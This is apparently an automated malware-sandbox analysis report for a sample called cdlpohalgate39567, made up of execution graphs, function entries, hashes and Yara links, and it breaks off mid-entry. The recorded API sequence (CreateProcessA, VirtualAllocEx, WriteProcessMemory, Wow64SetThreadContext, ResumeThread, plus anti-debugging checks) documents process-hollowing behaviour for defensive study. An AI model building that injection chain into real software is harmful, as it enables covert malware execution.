                                                                                                            execution_graph 11037 35b120 11039 35b144 11037->11039 11042 35b9cf 11039->11042 11046 35a9b4 11039->11046 11050 35a9c0 11039->11050 11043 35b9f2 11042->11043 11054 356b00 11043->11054 11047 35ba58 OutputDebugStringW 11046->11047 11049 35bb0a 11047->11049 11049->11039 11051 35bb50 CloseHandle 11050->11051 11053 35bbe6 11051->11053 11053->11039 11055 356b0b 11054->11055 11058 359938 11055->11058 11056 356ba5 11056->11039 11059 359964 11058->11059 11063 35a870 11059->11063 11067 35a880 11059->11067 11060 359a0e 11060->11056 11064 35a892 11063->11064 11071 35a8b1 11064->11071 11068 35a892 11067->11068 11070 35a8b1 NtQueryInformationProcess 11068->11070 11069 35a8a6 11069->11060 11070->11069 11072 35a8da 11071->11072 11079 35a950 11072->11079 11083 35a93f 11072->11083 11073 35a8f1 11087 35ad90 11073->11087 11091 35ad80 11073->11091 11074 35a8a6 11074->11060 11080 35a962 11079->11080 11081 356b00 NtQueryInformationProcess 11080->11081 11082 35a971 11081->11082 11082->11073 11084 35a962 11083->11084 11085 356b00 NtQueryInformationProcess 11084->11085 11086 35a971 11085->11086 11086->11073 11088 35adb4 11087->11088 11095 35a980 11088->11095 11092 35adb4 11091->11092 11093 35a980 NtQueryInformationProcess 11092->11093 11094 35ae3b 11093->11094 11094->11074 11096 35aef0 NtQueryInformationProcess 11095->11096 11098 35ae3b 11096->11098 11098->11074 11099 35b2a2 11101 35b1dc 11099->11101 11100 35a9b4 OutputDebugStringW 11100->11101 11101->11100 11102 35a9c0 CloseHandle 11101->11102 11103 35b9cf NtQueryInformationProcess 11101->11103 11102->11101 11103->11101 10918 bc54f2 10921 bc60f8 10918->10921 10919 bc5517 10922 bc6112 10921->10922 10923 bc6136 10922->10923 10940 bc691e 10922->10940 10944 bc67a7 10922->10944 10950 bc67a5 10922->10950 10954 bc6ae5 10922->10954 10958 bc67cb 10922->10958 10963 bc680a 10922->10963 10967 bc6baa 10922->10967 10971 bc6a2a 10922->10971 10976 bc6c29 10922->10976 10980 bc6a93 10922->10980 10984 bc6772 10922->10984 10988 bc6cf2 10922->10988 10993 bc68b6 10922->10993 10996 bc6655 10922->10996 11000 bc6554 10922->11000 11004 bc665f 10922->11004 10923->10919 10941 bc6924 10940->10941 11009 bc4268 10941->11009 10945 bc67ac 10944->10945 10947 bc664b 10945->10947 11013 bc4358 10945->11013 10946 bc694a 10946->10923 10947->10946 10948 bc4268 ResumeThread 10947->10948 10948->10946 10951 bc6779 10950->10951 11017 bc49e8 10951->11017 10955 bc6bbe 10954->10955 10957 bc49e8 WriteProcessMemory 10955->10957 10956 bc6c86 10956->10956 10957->10956 11021 bc48c0 10958->11021 10959 bc6c86 10962 bc49e8 WriteProcessMemory 10962->10959 10964 bc680d 10963->10964 10966 bc49e8 WriteProcessMemory 10964->10966 10965 bc6831 10965->10923 10966->10965 10969 bc6bcb 10967->10969 10968 bc6c86 10970 bc49e8 WriteProcessMemory 10969->10970 10970->10968 10972 bc667a 10971->10972 11025 bc4b48 10972->11025 11029 bc4b40 10972->11029 10973 bc6d7f 10977 bc6bcc 10976->10977 10979 bc49e8 WriteProcessMemory 10977->10979 10978 bc6c86 10979->10978 10981 bc6936 10980->10981 10983 bc4268 ResumeThread 10981->10983 10982 bc694a 10982->10923 10983->10982 10985 bc6778 10984->10985 10987 bc49e8 WriteProcessMemory 10985->10987 10986 bc6831 10986->10923 10987->10986 10989 bc6d69 10988->10989 10990 bc6cf6 10988->10990 10989->10990 10991 bc4b48 ReadProcessMemory 10989->10991 10992 bc4b40 ReadProcessMemory 10989->10992 10991->10990 10992->10990 10995 bc49e8 WriteProcessMemory 10993->10995 10994 bc68e4 10994->10923 10995->10994 10998 bc6656 10996->10998 10997 bc694a 10997->10923 10998->10997 10999 bc4268 ResumeThread 10998->10999 10999->10997 11001 bc655e 11000->11001 11033 bc4d80 11001->11033 11005 bc667a 11004->11005 11007 bc4b48 ReadProcessMemory 11005->11007 11008 bc4b40 ReadProcessMemory 11005->11008 11006 bc6d7f 11007->11006 11008->11006 11010 bc42ac ResumeThread 11009->11010 11012 bc42fe 11010->11012 11012->10923 11014 bc43a1 Wow64SetThreadContext 11013->11014 11016 bc441f 11014->11016 11016->10947 11018 bc4a34 WriteProcessMemory 11017->11018 11020 bc4ad3 11018->11020 11020->10923 11022 bc4904 VirtualAllocEx 11021->11022 11024 bc4982 11022->11024 11024->10962 11026 bc4b94 ReadProcessMemory 11025->11026 11028 bc4c12 11026->11028 11028->10973 11030 bc4b48 ReadProcessMemory 11029->11030 11032 bc4c12 11030->11032 11032->10973 11034 bc4e07 CreateProcessA 11033->11034 11036 bc5065 11034->11036

                                                                                                            Executed Functions

                                                                                                            Function 0035AEE8 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1659 35aee8-35afbb NtQueryInformationProcess 1662 35afc4-35affa 1659->1662 1663 35afbd-35afc3 1659->1663 1663->1662
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0035AFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436408107.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_350000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: e1eb286b909b560cd98e215ea46c0e0cba426fbd92d2c74bccf43eecda02b968
                                                                                                            • Instruction ID: 17faff4e1d60c6fbf8acca6cc1aba0df1b2ec145294c1e20f1721d87c1a430b1
                                                                                                            • Opcode Fuzzy Hash: e1eb286b909b560cd98e215ea46c0e0cba426fbd92d2c74bccf43eecda02b968
                                                                                                            • Instruction Fuzzy Hash: BC4166B8D042589FCF11CFA9D984ADEFBB5BB59314F20902AE814B7310D335A905CF65
                                                                                                            Function 0035A980 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1666 35a980-35afbb NtQueryInformationProcess 1669 35afc4-35affa 1666->1669 1670 35afbd-35afc3 1666->1670 1670->1669
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0035AFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436408107.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_350000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: 6c57ceaeb0298866da77903424c313f94f8942583b538207273eb97b0eda0792
                                                                                                            • Instruction ID: ad6b550eff5cdd21c0dcf454e3920b9e7f1a19f8a425a9808e1bf1b12d59dd24
                                                                                                            • Opcode Fuzzy Hash: 6c57ceaeb0298866da77903424c313f94f8942583b538207273eb97b0eda0792
                                                                                                            • Instruction Fuzzy Hash: A84175B8D042589FCF10CFA9D984ADEFBB5BB49314F20902AE818B7310D335A905CF65
                                                                                                            Function 00BC4D80 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1566 bc4d80-bc4e19 1568 bc4e1b-bc4e32 1566->1568 1569 bc4e62-bc4e8a 1566->1569 1568->1569 1572 bc4e34-bc4e39 1568->1572 1573 bc4e8c-bc4ea0 1569->1573 1574 bc4ed0-bc4f26 1569->1574 1575 bc4e5c-bc4e5f 1572->1575 1576 bc4e3b-bc4e45 1572->1576 1573->1574 1584 bc4ea2-bc4ea7 1573->1584 1582 bc4f6c-bc5063 CreateProcessA 1574->1582 1583 bc4f28-bc4f3c 1574->1583 1575->1569 1577 bc4e49-bc4e58 1576->1577 1578 bc4e47 1576->1578 1577->1577 1581 bc4e5a 1577->1581 1578->1577 1581->1575 1602 bc506c-bc5151 1582->1602 1603 bc5065-bc506b 1582->1603 1583->1582 1592 bc4f3e-bc4f43 1583->1592 1585 bc4ea9-bc4eb3 1584->1585 1586 bc4eca-bc4ecd 1584->1586 1587 bc4eb5 1585->1587 1588 bc4eb7-bc4ec6 1585->1588 1586->1574 1587->1588 1588->1588 1591 bc4ec8 1588->1591 1591->1586 1594 bc4f45-bc4f4f 1592->1594 1595 bc4f66-bc4f69 1592->1595 1596 bc4f51 1594->1596 1597 bc4f53-bc4f62 1594->1597 1595->1582 1596->1597 1597->1597 1599 bc4f64 1597->1599 1599->1595 1615 bc5161-bc5165 1602->1615 1616 bc5153-bc5157 1602->1616 1603->1602 1618 bc5175-bc5179 1615->1618 1619 bc5167-bc516b 1615->1619 1616->1615 1617 bc5159 1616->1617 1617->1615 1621 bc5189-bc518d 1618->1621 1622 bc517b-bc517f 1618->1622 1619->1618 1620 bc516d 1619->1620 1620->1618 1624 bc518f-bc51b8 1621->1624 1625 bc51c3-bc51ce 1621->1625 1622->1621 1623 bc5181 1622->1623 1623->1621 1624->1625
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BC5047
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: b3dc9a60f97e8da3f877c78f4f1affd5681703441ca215a39ad7eeee074d9549
                                                                                                            • Instruction ID: 23ba6460d9954bfb61bcfecac45aed36f8a8672b0f3430250091e1e15228ef40
                                                                                                            • Opcode Fuzzy Hash: b3dc9a60f97e8da3f877c78f4f1affd5681703441ca215a39ad7eeee074d9549
                                                                                                            • Instruction Fuzzy Hash: 4CC10270D002198FDB24DFA4C895BEEBBF1BB49300F0491A9E859B7250DB74AA85CF95
                                                                                                            Function 00BC49E8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1629 bc49e8-bc4a53 1631 bc4a6a-bc4ad1 WriteProcessMemory 1629->1631 1632 bc4a55-bc4a67 1629->1632 1634 bc4ada-bc4b2c 1631->1634 1635 bc4ad3-bc4ad9 1631->1635 1632->1631 1635->1634
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BC4ABB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: b6fbf86967f685b281485c65400ba46227b48b9f26639052826daa4c98c03058
                                                                                                            • Instruction ID: 9a7f9dac1e15ffcd0066d51c86b5998f4db899ba44a4fe870ba6e58bd4f944a3
                                                                                                            • Opcode Fuzzy Hash: b6fbf86967f685b281485c65400ba46227b48b9f26639052826daa4c98c03058
                                                                                                            • Instruction Fuzzy Hash: 0C4199B5D012589FCF00CFA9D984AEEBBF1FB49314F20902AE814B7250D775AA55CB64
                                                                                                            Function 00BC4B40 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1640 bc4b40-bc4c10 ReadProcessMemory 1644 bc4c19-bc4c6b 1640->1644 1645 bc4c12-bc4c18 1640->1645 1645->1644
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BC4BFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 17159ac7e30e7f08b708fa1b908e1075349556b3b4ea41448a0abcafd00acaf1
                                                                                                            • Instruction ID: 28fb202b4208bf3516c90440881dc2a46c1e20899de40cd4c0e5559707b9595d
                                                                                                            • Opcode Fuzzy Hash: 17159ac7e30e7f08b708fa1b908e1075349556b3b4ea41448a0abcafd00acaf1
                                                                                                            • Instruction Fuzzy Hash: D241A9B8D002589FCF00DFA9D884AEEFBB1FB49310F20942AE814B7250D735AA55CF65
                                                                                                            Function 00BC4B48 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1650 bc4b48-bc4c10 ReadProcessMemory 1653 bc4c19-bc4c6b 1650->1653 1654 bc4c12-bc4c18 1650->1654 1654->1653
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00BC4BFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: ac7a5b73a4a212449b50df11b65dbd2866602fe7c41c01103cb500de498cdf05
                                                                                                            • Instruction ID: ca3c90cafaa9a004050fba11ba920c35463a5156f7a05a613fd757db71f07353
                                                                                                            • Opcode Fuzzy Hash: ac7a5b73a4a212449b50df11b65dbd2866602fe7c41c01103cb500de498cdf05
                                                                                                            • Instruction Fuzzy Hash: 0041B8B8D002589FCF00CFA9D884AEEFBB1FB49310F20902AE814B7210D735AA55CF65
                                                                                                            Function 00BC48C0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1673 bc48c0-bc4980 VirtualAllocEx 1676 bc4989-bc49d3 1673->1676 1677 bc4982-bc4988 1673->1677 1677->1676
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00BC496A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 84d331a6432abf3444f8880af8162ed16b4bffbf372fb144d20590d851c61289
                                                                                                            • Instruction ID: 09785e697b8ceb845337e873f87d8e4a65ab4df995542ce490bc234699f0ca71
                                                                                                            • Opcode Fuzzy Hash: 84d331a6432abf3444f8880af8162ed16b4bffbf372fb144d20590d851c61289
                                                                                                            • Instruction Fuzzy Hash: 15418AB8D002589FCF10CFA9D984AAEBBB5AB49310F10941AE814B7210D775A915CF55
                                                                                                            Function 00BC4358 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1682 bc4358-bc43b8 1684 bc43cf-bc441d Wow64SetThreadContext 1682->1684 1685 bc43ba-bc43cc 1682->1685 1687 bc441f-bc4425 1684->1687 1688 bc4426-bc4472 1684->1688 1685->1684 1687->1688
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00BC4407
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: b45cc79815a89e06605b633baee9b6ea72106441333d083dfb88b22f28b2e8b6
                                                                                                            • Instruction ID: 2b6b545493cea1ed8fd629707e9b439bc104c34a8db03bff842fb1c52c134d17
                                                                                                            • Opcode Fuzzy Hash: b45cc79815a89e06605b633baee9b6ea72106441333d083dfb88b22f28b2e8b6
                                                                                                            • Instruction Fuzzy Hash: CF41ADB4D002589FDB14DFA9D884AEEBBF1EB49314F24802AE814B7340D739AA45CF54
                                                                                                            Function 0035A9B4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1693 35a9b4-35bab1 1696 35bac5-35bb08 OutputDebugStringW 1693->1696 1697 35bab3-35bac2 1693->1697 1698 35bb11-35bb3f 1696->1698 1699 35bb0a-35bb10 1696->1699 1697->1696 1699->1698
                                                                                                            APIs
                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 0035BAF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436408107.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_350000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DebugOutputString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1166629820-0
                                                                                                            • Opcode ID: fcdf79876949b2842ce35e213d32caccd954acf54e04588330215565422217c8
                                                                                                            • Instruction ID: 1e569c3dabdfcb6a0245e938ae3ad113e86229b1948f514c0a828e081daeea1f
                                                                                                            • Opcode Fuzzy Hash: fcdf79876949b2842ce35e213d32caccd954acf54e04588330215565422217c8
                                                                                                            • Instruction Fuzzy Hash: 15319BB4D002489FCB15CFA9D584AEEFBF5AF49314F24906AE818B7320D774A945CF94
                                                                                                            Function 00BC4268 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.437379311.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 075770886778ed3c671f6ad470a67284146cfa2974cfac7ebfabf1da5905fdf1
                                                                                                            • Instruction ID: 96ddf0ef36a8fc59058a7dad10c67b7c4b18f28a3728aa712bfcf37c1364dc5d
                                                                                                            • Opcode Fuzzy Hash: 075770886778ed3c671f6ad470a67284146cfa2974cfac7ebfabf1da5905fdf1
                                                                                                            • Instruction Fuzzy Hash: 6631BAB4D002589FCF14DFA9D984AAEFBB5EF89314F20942AE814B7300D735AA05CF95
                                                                                                            Function 0035BB48 Relevance: 1.3, APIs: 1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436408107.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_350000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 76d7a66631e5fff4bc445fdfd977b2fcfdd3fa48aac05c64342b3329adabbacd
                                                                                                            • Instruction ID: 31f7dae4e92f07bcacca7f9a72ab606e052157da36ea73d3cd4df6b6e6dbb3f8
                                                                                                            • Opcode Fuzzy Hash: 76d7a66631e5fff4bc445fdfd977b2fcfdd3fa48aac05c64342b3329adabbacd
                                                                                                            • Instruction Fuzzy Hash: 3A31CEB4D002189FCB10CFA9D484AEEFBF5EB49314F24905AE814B3350C378AA45CF64
                                                                                                            Function 0035A9C0 Relevance: 1.3, APIs: 1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436408107.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_350000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: a90d2eedc0273966e8088bda850f300fcee7c130fa0619fa6b7905802eb2b90f
                                                                                                            • Instruction ID: 50df332ee4425745a521dcc85cf3b86940a3f5a9f4ed869c06b38e0e0f71a521
                                                                                                            • Opcode Fuzzy Hash: a90d2eedc0273966e8088bda850f300fcee7c130fa0619fa6b7905802eb2b90f
                                                                                                            • Instruction Fuzzy Hash: 4631CBB4D002189FCB10CFA9D484AEEFBF4AB49314F24906AE814B7350D378AA45CFA5
                                                                                                            Function 002FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436257959.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2fd000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0dc64b7b095392aadb8ec2fe31c9197934ac1c6ec4ea3d653e397ffb387308f5
                                                                                                            • Instruction ID: b960182dabb425be2f72233f052e5ac776f2665fd33f369d81ddf1c2882bd8e6
                                                                                                            • Opcode Fuzzy Hash: 0dc64b7b095392aadb8ec2fe31c9197934ac1c6ec4ea3d653e397ffb387308f5
                                                                                                            • Instruction Fuzzy Hash: D1210075624248DFEB14DF24D8C0B26FB62EB84314F30C57DD9094B282CB3AD867CAA1
                                                                                                            Function 002FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436257959.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2fd000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ad54073e4d2b530bfb2f5563d1442ba3641c86e18411b1bd0b554179f69d671
                                                                                                            • Instruction ID: 28cd5fffc1f68c5d5e4a1c38d56840b75b4bca3c15511bbb77ac263030f08b5f
                                                                                                            • Opcode Fuzzy Hash: 4ad54073e4d2b530bfb2f5563d1442ba3641c86e18411b1bd0b554179f69d671
                                                                                                            • Instruction Fuzzy Hash: 7D21D075624248EFEB05DF14D9C0B26FBA6EB84314F30C5B9DD094B286C376D866CAA1
                                                                                                            Function 002FD006 Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436257959.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2fd000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 770de64add5c0efb605c29f8ca77b63dcc1f8148664c5e496236779aab3197a8
                                                                                                            • Instruction ID: d4e378854f1e4999f31b33c1c8ae4f0808052b9dffd55e4065872c6a44065f88
                                                                                                            • Opcode Fuzzy Hash: 770de64add5c0efb605c29f8ca77b63dcc1f8148664c5e496236779aab3197a8
                                                                                                            • Instruction Fuzzy Hash: 5D218E755093848FDB02CF24D994715FF72EB46314F28C5EAD8498B2A7C33A985ACB62
                                                                                                            Function 002FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.436257959.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2fd000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                                                                            • Instruction ID: 8d3df5a984ed0715e6e8b6b6cb53b4bbc37fba065a06a8a9dae7c13eaea0c0e7
                                                                                                            • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                                                                            • Instruction Fuzzy Hash: D511BB75504284DFDB02CF14C5C4B25FBA2FB84314F24C6AADD494B256C33AD85ACBA2

                                                                                                            Executed Functions

                                                                                                            Function 00259A4A Relevance: 4.3, Strings: 1, Instructions: 3075COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: N
                                                                                                            • API String ID: 0-1130791706
                                                                                                            • Opcode ID: 94fcf2ae40d5030c252ffce2619352b07a21dff1cfdd67ed39be2257b967634b
                                                                                                            • Instruction ID: ed3f5d547fe8fcd3916f5d77cfe1b3c739d1a46d793df7bdbdb5ce026e77a8da
                                                                                                            • Opcode Fuzzy Hash: 94fcf2ae40d5030c252ffce2619352b07a21dff1cfdd67ed39be2257b967634b
                                                                                                            • Instruction Fuzzy Hash: 8D73D231C1075A8EDB11EF68C884AADF7B1FF99300F51869AE44977221EB70AAD4CF45
                                                                                                            Function 00BC0040 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942556110.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bc0000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: K
                                                                                                            • API String ID: 0-856455061
                                                                                                            • Opcode ID: 340b6ebaf7049bbe19a082c73035b4226a3f1638e36ce3043fdbe358e33ff33a
                                                                                                            • Instruction ID: 41df7135a7eb5843abd67aba9ecb158aeabcb17d09f2f6a1eaf20fa5776f8099
                                                                                                            • Opcode Fuzzy Hash: 340b6ebaf7049bbe19a082c73035b4226a3f1638e36ce3043fdbe358e33ff33a
                                                                                                            • Instruction Fuzzy Hash: DF33D071C146198EDB11EF68C884AADF7B1FF99300F51C69AE45877221EB70AAC4DF81
                                                                                                            Function 002569B8 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: &55p
                                                                                                            • API String ID: 0-1955183375
                                                                                                            • Opcode ID: 091527a1241be33aea01bfebcb463789454b853f35ecae59a14a91a2f754bfd0
